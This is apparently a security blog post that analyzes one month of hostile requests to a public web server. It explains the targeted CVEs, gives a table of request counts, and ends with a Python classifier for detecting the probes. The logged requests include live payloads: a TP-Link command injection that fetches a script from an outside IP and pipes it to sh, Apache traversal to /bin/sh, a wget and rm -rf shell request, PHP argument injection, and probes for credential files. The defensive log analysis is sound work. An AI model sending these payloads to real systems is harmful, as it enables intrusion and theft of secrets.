Web server log analysis: October 2024

2024-11-18 Technical

I analyzed the logs of a publicly exposed web server for traffic that is not normal access.

Frequent requests

Access to login pages

I could not identify which service was being targeted, but there was access to a login page for brute-force purposes.

/admin/assets/js/views/login.js

There was also access to the WordPress login page.

/wp-login.php

Attacks targeting the TP-Link Archer AX21 router vulnerability (CVE-2023-1389)

MBSD-SOC detection trend topics for June 2023 | Engineer Blog | Mitsui Bussan Secure Directions, Inc.

/cgi-bin/luci/;stok=/locale
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60)

Remote execution of eval() through PHPUnit

Traffic attempting to execute eval() through a vulnerability in PHPUnit, the unit-testing tool for PHP.

JVNDB-2017-005280 - JVN iPedia - Vulnerability Countermeasure Information Database

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
/vendor/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/Util/PHP/eval-stdin.php
/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/LICENSE/eval-stdin.php
/phpunit/src/Util/PHP/eval-stdin.php
/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/phpunit/phpunit/Util/PHP/eval-stdin.php
/phpunit/Util/PHP/eval-stdin.php
/lib/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php
/lib/phpunit/Util/PHP/eval-stdin.php
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Shell execution via the Apache path traversal vulnerabilities (CVE-2021-41773, CVE-2021-42013)

There were attacks simply attempting path traversal.

Verifying the Apache HTTP Server directory traversal vulnerability CVE-2021-41773 #Apache_http_server - Qiita

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

Attacks targeting the PHP vulnerability (CVE-2024-4577)

Exploitation of CVE-2024-4577 observed just one day after its publication
About attacks targeting the PHP vulnerability (CVE-2024-4577) | Information Security | IPA (Information-technology Promotion Agency, Japan)

/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

Web UI vulnerability in Cisco network devices such as Cisco IOS XE

This appears to be traffic attempting to reach the Web UI of network devices like those described in the article below.
About the Web UI vulnerability in Cisco IOS XE (CVE-2023-20198 and others) | Information Security | IPA (Information-technology Promotion Agency, Japan)

/webui/

GeoServer vulnerability

Critical GeoServer vulnerability CVE-2023-35042 fixed: RCE attacks observed – IoT OT Security News

/geoserver/web/

Spring Framework vulnerability

This appears to be traffic related to a vulnerability in Spring Cloud Gateway, a component of the Spring Framework.
CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability

/actuator/gateway/routes

Vulnerability in a Faraday product

NVD - cve-2024-4584
CVE-2024-4584 Faraday GM8181/GM828x command_port.ini information disclosure

/command_port.ini

phpinfo

/_profiler/phpinfo
/app_dev.php/_profiler/phpinfo

List of suspicious requests

uri count
/.env 632
/sw.js 408
/admin/assets/js/views/login.js 301
/cgi-bin/luci/;stok=/locale 237
/ads.txt 207
mstshash=Administr 194
* 158
/.git/config 151
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 150
\x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=’:\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC0 133
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh 121
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh 113
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input 108
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php 107
/vendor/phpunit/src/Util/PHP/eval-stdin.php 106
/vendor/phpunit/Util/PHP/eval-stdin.php 106
/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 105
/vendor/phpunit/phpunit/LICENSE/eval-stdin.php 105
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60) 104
/phpunit/src/Util/PHP/eval-stdin.php 103
/phpunit/phpunit/src/Util/PHP/eval-stdin.php 103
/phpunit/phpunit/Util/PHP/eval-stdin.php 103
/phpunit/Util/PHP/eval-stdin.php 102
/lib/phpunit/src/Util/PHP/eval-stdin.php 102
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php 102
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php 102
/lib/phpunit/Util/PHP/eval-stdin.php 102
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/sellers.json 101
/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello 101
/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello 101
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php 101
/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/index.php?lang=../../../../../../../../tmp/index1 100
/wp-login.php 98
/app-ads.txt 96
/login.rsp 86
/.well-known/traffic-advice 79
/index.xml 70
/containers/json 67
//.env 62
/webui/ 61
/geoserver/web/ 60
/actuator/gateway/routes 59
/api/.env 54
/app/.env 49
/command_port.ini 46
/.env.production 45
/backend/.env 43
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 43
//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js 41
/.json 41
/config.json 36
/admin/.env 36
/app_dev.php/_profiler/open?file=app/config/parameters.yml 34
/_profiler/phpinfo 32
/manifest.js 31
/t4 29
/.env.prod 29
/info.php 28
/demo/.env 28
/staging/.env 27
/shell?cd+/tmp;rm+-rf+*;wget+ 27
/debug/default/view?panel=config 27
/.env.bak 27
/library/.env 26
/.env.example 26
/dns-query 23
/HNAP1/ 23
/.well-known/security.txt 23
/wp 22
/wordpress 22
/public/.env 22
/post/wp-login.php 22
/new 22
/core/.env 22
/config/.env 22
/app_dev.php/_profiler/phpinfo 22
/phpinfo.php 21
/old 21
/main 21
/infos/ 21
/info/ 21
/home 21
/bk 21
/bc 21
/backup 21
/apps/.env 21
/web/.env 19
/vendor/.env 19
/laravel/.env 19
/.env.dev 19
/actuator/health 18
/HNAP1 18
/server-status 17
/sdk 17
/index.php 17
//sftp.json 17
//sftp-config.json 17
/web/debug/default/view 16
/tool/view/phpinfo.view.php 16
/frontend/web/debug/default/view 16
/dev/.env 16
/data/.env 16
/config/aws.yml 16
/.env.save 16
/.DS_Store 16
/pinfo.php 15
/login.action 15
/api/geojson?url=file:///etc/hosts 15
/aab8 15
/.env~ 15
/.env.stage 15
/telescope/requests 14
/s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties 14
/owa/auth/logon.aspx 14
/owa/ 14
/login 14
/infophp.php 14
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 14
/cgi-bin/authLogin.cgi 14
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts 14
/aaa9 14
/.config.yaml 14
/.aws/credentials 14
/v2/_catalog 13
/owa/auth/x.js 13
/idx_config/ 13
/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage 13
/autodiscover/autodiscover.json?@zdi/Powershell 13
/about/site_icons/icon-192x192.png 13
//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js 13
//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js 13
//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js 13
/.well-known/assetlinks.json 13
/.well-known/apple-app-site-association 13
/.env.development 13
/webui 12
/user 12
/resolve?name=example.com&type=A 12
/resolve 12
/query?name=example.com&type=A 12
/query 12
/media/.env 12
/manager/html 12
/human.aspx 12
/dns-query?name=example.com&type=A 12
/client/.env 12
/aws.yml 12
/about 12
/.vscode/.env 12
/.gitlab-ci/.env 12
/.env.test 12
7 11
/version 11
/v2/.env 11
/static/.env 11
/stag/.env 11
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ 11
/solr/admin/info/system 11
/solr/admin/cores?action=STATUS&wt=json 11
/query?q=SHOW+DIAGNOSTICS 11
/portal/redlion 11
/new/.env 11
/misc/.env 11
/log/.env 11
/index.asp 11
/images/.env 11
/html/.env 11
/home/.env 11
/exapi/.env 11
/evox/about 11
/docker/.env 11
/doc/.env 11
/cp/.env 11
/client_secrets.json 11
/aab9 11
/.env.production.local 11
/.env.old 11
/.env.local 11
/.env.development.local 11
/teorema505?t=1 10
/templates/.env 10
/phpinfos.php 10
/locally/.env 10
/localhost/.env 10
/druid/index.html 10
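The following is an added example, not part of the original post: a small Python classifier that tags access-log lines against the probe families described above (PHPUnit eval-stdin, the TP-Link luci path, the single- and double-encoded Apache CVE-2021-41773/42013 traversal, the %AD argument injection of CVE-2024-4577, .env probing and wp-login.php) and builds a uri/count table like the one above. The log lines, addresses and category labels are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample lines in Apache combined log format (not taken from the post's logs).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Oct/2024:03:14:07 +0900] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Oct/2024:03:14:08 +0900] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Oct/2024:04:02:11 +0900] "POST /cgi-bin/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 404 196 "-" "curl/7.88"
198.51.100.9 - - [12/Oct/2024:04:02:12 +0900] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 404 196 "-" "curl/7.88"
192.0.2.77 - - [12/Oct/2024:05:30:00 +0900] "GET /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 196 "-" "python-requests/2.31"
192.0.2.77 - - [12/Oct/2024:05:30:01 +0900] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 196 "-" "python-requests/2.31"
192.0.2.78 - - [12/Oct/2024:06:00:00 +0900] "GET /api/.env HTTP/1.1" 404 196 "-" "Go-http-client/1.1"
192.0.2.78 - - [12/Oct/2024:06:00:02 +0900] "GET /wp-login.php HTTP/1.1" 404 196 "-" "Go-http-client/1.1"
192.0.2.80 - - [12/Oct/2024:07:00:00 +0900] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

def normalize(uri: str) -> bytes:
    # Decode twice because the CVE-2021-42013 probes are double-encoded (%%32%65 -> %2e -> .);
    # stay in bytes so the 0xAD byte of the CVE-2024-4577 probe is preserved, not mangled.
    return unquote_to_bytes(unquote_to_bytes(uri)).lower()

# (label, predicate on the normalized URI); the first matching rule wins.
RULES = [
    ("phpunit eval-stdin", lambda u: b"eval-stdin.php" in u),
    ("tp-link luci (CVE-2023-1389)", lambda u: b"/cgi-bin/luci/;stok=" in u),
    ("apache traversal (CVE-2021-41773/42013)",
     lambda u: u.startswith(b"/cgi-bin/") and b"../" in u),
    # 0xAD (soft hyphen) right before an option letter is the php-cgi argument-injection marker.
    ("php-cgi arg injection (CVE-2024-4577)", lambda u: re.search(rb"\xad[a-z]", u) is not None),
    (".env probe", lambda u: u.split(b"?")[0].endswith(b"/.env") or b"/.env." in u),
    ("wordpress login", lambda u: b"/wp-login.php" in u),
]

def classify(uri: str) -> str:
    u = normalize(uri)
    return next((label for label, hit in RULES if hit(u)), "unclassified")

def analyze(log_text: str):
    """Return (uri -> count, category -> count) for matched lines, like the post's uri/count table."""
    by_uri, by_cat = Counter(), Counter()
    for m in LOG_RE.finditer(log_text):
        cat = classify(m.group("uri"))
        if cat != "unclassified":
            by_uri[m.group("uri")] += 1
            by_cat[cat] += 1
    return by_uri, by_cat
```

`analyze(SAMPLE_LOG)` returns the two counters; printing `by_uri.most_common()` gives the uri/count layout used in the table above, and ordinary traffic such as `/index.html` is left out.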
